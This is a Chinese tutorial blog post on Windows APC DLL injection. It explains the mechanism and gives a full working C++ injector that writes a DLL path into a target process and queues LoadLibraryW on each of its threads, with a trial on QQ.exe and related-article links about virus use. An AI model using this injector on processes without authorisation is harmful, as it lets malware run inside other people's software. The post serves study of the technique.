APC注入

APC注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的,其具体流程如下:

    1)当EXE里某个线程执行到SleepEx()或者WaitForSingleObjectEx()时,系统就会产生一个软中断(或者是Messagebox弹窗的时候不点OK的时候也能注入)。

    2)当线程再次被唤醒时,此线程会首先执行APC队列中的被注册的函数。

    3)利用QueueUserAPC()这个API可以在软中断时向线程的APC队列插入一个函数指针,如果我们插入的是Loadlibrary()执行函数的话,就能达到注入DLL的目的。

核心函数:

局限:

这种注入方式局限性很明显,一是必须要等待时机,而是当注入成功后,SleepEx或者其他等待函数直接就会跳过当前等待继续往下走,这样可能造成被注入程序的不稳定行,经常导致被注入程序崩溃。

代码:

// LoadExeWin32.cpp : 定义控制台应用程序的入口点。

//

#include "stdafx.h"

#include <string>

#include <windows.h>

#include <shlwapi.h>

#include <tlhelp32.h>

#include <winternl.h>

#pragma comment(lib, "shlwapi.lib")

#pragma comment(lib,"ntdll.lib")

using namespace std;

//根据进程名字获取pid

DWORD GetPidFromName(wstring wsProcessName) {

HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if (hSnapshot == INVALID_HANDLE_VALUE){

return FALSE;

}

PROCESSENTRY32W pe = {sizeof(pe)};

BOOL bOk;

for (bOk = Process32FirstW(hSnapshot, &pe); bOk; bOk = Process32NextW(hSnapshot, &pe)){

wstring  wsNowProcName = pe.szExeFile;

if(StrStrI(wsNowProcName.c_str() ,wsProcessName.c_str())!= NULL){

CloseHandle(hSnapshot);

return pe.th32ProcessID;

}

}

CloseHandle(hSnapshot);

return 0;

}

//把wcCacheInDllPath DLL文件注入进程wsProcessName

BOOL Injection_APC(const wstring &wsProcessName ,const WCHAR wcCacheInDllPath[]){

//初始化

DWORD dwProcessId  = GetPidFromName(wsProcessName);

HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessId);

if (!hProcess){

return FALSE;

}

PVOID  lpData = VirtualAllocEx(hProcess,

NULL,

1024,

MEM_COMMIT,

PAGE_EXECUTE_READWRITE);

DWORD dwRet;

if (lpData)  {

//在远程进程申请空间中写入待注入DLL的路径

 WriteProcessMemory(hProcess,

lpData,

(LPVOID)wcCacheInDllPath,

MAX_PATH,&dwRet);

}

CloseHandle(hProcess);

//开始注入

THREADENTRY32 te = {sizeof(THREADENTRY32)};

//得到线程快照

HANDLE handleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD ,0);

if (INVALID_HANDLE_VALUE == handleSnap)  {

return FALSE;

}

BOOL bStat = FALSE;

//得到第一个线程

if (Thread32First(handleSnap,&te)){

do {  //进行进程ID对比

if (te.th32OwnerProcessID == dwProcessId)  {

//得到线程句柄

HANDLE handleThread = OpenThread(THREAD_ALL_ACCESS ,FALSE ,te.th32ThreadID);

if (handleThread)  {  //向线程插入APC

DWORD dwRet = QueueUserAPC(

(PAPCFUNC)LoadLibraryW,

handleThread,

(ULONG_PTR)lpData);

if (dwRet > 0)  {

bStat = TRUE;

}

//关闭句柄

CloseHandle(handleThread);

}

}

//循环下一个线程

} while (Thread32Next(handleSnap,&te));

}

CloseHandle(handleSnap);

return bStat;

}

//Adds a user-mode asynchronous procedure call (APC)

int main(int argc, char* argv[]){

//Sleep(1000*100);

Injection_APC(L"Sleep3M.exe" ,L"M.dll");

   return 0;

}

然后写一个测试DLL:

然后再写一个被注入程序:

测试结果:

注入自己的程序成功:

随便尝试了下注入QQ.exe,直接崩溃退出了。

DLL注入-APC注入的更多相关文章

  1. 分析恶意驱动(进程启动apc注入dll)

    一.前言  用IDA也有好些时间了,以前就只会用F5功能玩无壳无保护的裸驱动,感觉太坑了,这两天就开始看网上大牛的逆向. 今天记录一下sudami曾经逆向过的fuck.sys.第一遍自己走的时候漏掉了 ...

  2. Dll注入:Ring3 层 APC注入

    APC,即Asynchronous procedure call,异步程序调用APC注入的原理是:在一个进程中,当一个执行到SleepEx()或者WaitForSingleObjectEx()时,系统 ...

  3. Dll注入技术之APC注入

    APC注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的,其具体流程如下:     1)当EXE里某个线程执行到SleepEx( ...

  4. APC注入

    0X01 注入原理 当线程被唤醒时APC中的注册函数会被执行的机制,并依此去调用我们的DLL加载代码,进而完成注入的目的 具体的流程: 1 当EXE里的某个线程执行到sleepEX(),或者waitF ...

  5. 常见注入手法第二讲,APC注入

    常见注入手法第二讲,APC注入 转载注明出处 首先,我们要了解下什么是APC APC 是一个简称,具体名字叫做异步过程调用,我们看下MSDN中的解释,异步过程调用,属于是同步对象中的函数,所以去同步对 ...

  6. 注入理解之APC注入

    近期学习做了一个各种注入的MFC程序,把一些心得和体会每天分享一些 APC(Asynchronous procedure call)异步程序调用,在NT中,有两种类型的APCs:用户模式和内核模式.用 ...

  7. HOOK -- DLL的远程注入技术详解(1)

    DLL的远程注入技术是目前Win32病毒广泛使用的一种技术.使用这种技术的病毒体通常位于一个DLL中,在系统启动的时候,一个EXE程序会将这个DLL加载至某些系统进程(如Explorer.exe)中运 ...

  8. DLL的远程注入技术

    DLL的远程注入技术是目前Win32病毒广泛使用的一种技术.使用这种技术的病毒体通常位于一个DLL中,在系统启动的时候,一个EXE程序会将这个DLL加载至某些系统进程(如Explorer.exe)中运 ...

  9. windows:shellcode 代码远程APC注入和加载

    https://www.cnblogs.com/theseventhson/p/13197776.html  上一章介绍了通用的shellcode加载器,这个加载器自己调用virtualAlloc分配 ...

随机推荐

  1. Python学习笔记 CH1-4:从入门到列表

    Python CH1 环境准备 因为已经有了C/C++.Java的基础,所以上手很快. 参考书:Eric Matthes -<Python编程 从入门到实践> 环境准备:python3.P ...

  2. 漏洞复现-Bash之一键破壳

        注:使用docker搭建测试环境 (1)访问搭建的环境网址:http://192.168.11.101:8081/ (2)使用burp拦截数据包,并修改User-Agent的内容: (3)使用 ...

  3. CMDB项目要点之技术点(面试题)

    1.单例模式 日志对象用单例模式 django admin中注册类是,用到单例模式 为什么要用单例模式 同一个对象操作 维护全局变量 + 对全局变量做一些操作 # __new__ import thr ...

  4. 【海思】Hi3516A 运行sample_venc的demo内核奔溃(DDR问题)

    作者:李春港 出处:https://www.cnblogs.com/lcgbk/p/14514297.html 目录 一.前言 二.使用memtester对ddr进行压力测试 三.修改uboot的DD ...

  5. 【工具】 memtester内存压力测试工具

    作者:李春港 出处:https://www.cnblogs.com/lcgbk/p/14497838.html 目录 一.简介 二.Memtester安装 三.使用说明 四.测试示例 一.简介 mem ...

  6. 【翻译】内部API的价值

    内部api的设计,主要是为了简化软件的开发,简化系统和操作过程.目前绝大多数用例是这样的. 内部api经常被忽略,因为它们是针对内部开发人员的.这种类型的api通常使用于特定公司及其部门的专用数据.尽 ...

  7. 【Azure Developer】Python 获取Micrisoft Graph API资源的Access Token, 并调用Microsoft Graph API servicePrincipals接口获取应用ID

    问题描述 在Azure开发中,我们时常面临获取Authorization问题,需要使用代码获取到Access Token后,在调用对应的API,如servicePrincipals接口. 如果是直接调 ...

  8. Bits.java

    package java.io; /**  * Utility methods for packing/unpacking primitive values in/out of byte arrays ...

  9. Angle Beats Gym - 102361A

    题目链接:https://vjudge.net/problem/Gym-102361A 题意:给定N个点,q次询问每次询问给一个点,问在N个点中取2个和给定点最多可以组成几个直角三角形. 思路:htt ...

  10. HDU(1420)Prepared for New Acmer(JAVA语言)【快速幂模板】

    思路:快速幂裸题. //注意用long,否则会超范围 Problem Description 集训进行了将近2个礼拜,这段时间以恢复性训练为主,我一直在密切关注大家的训练情况,目前为止,对大家的表现相 ...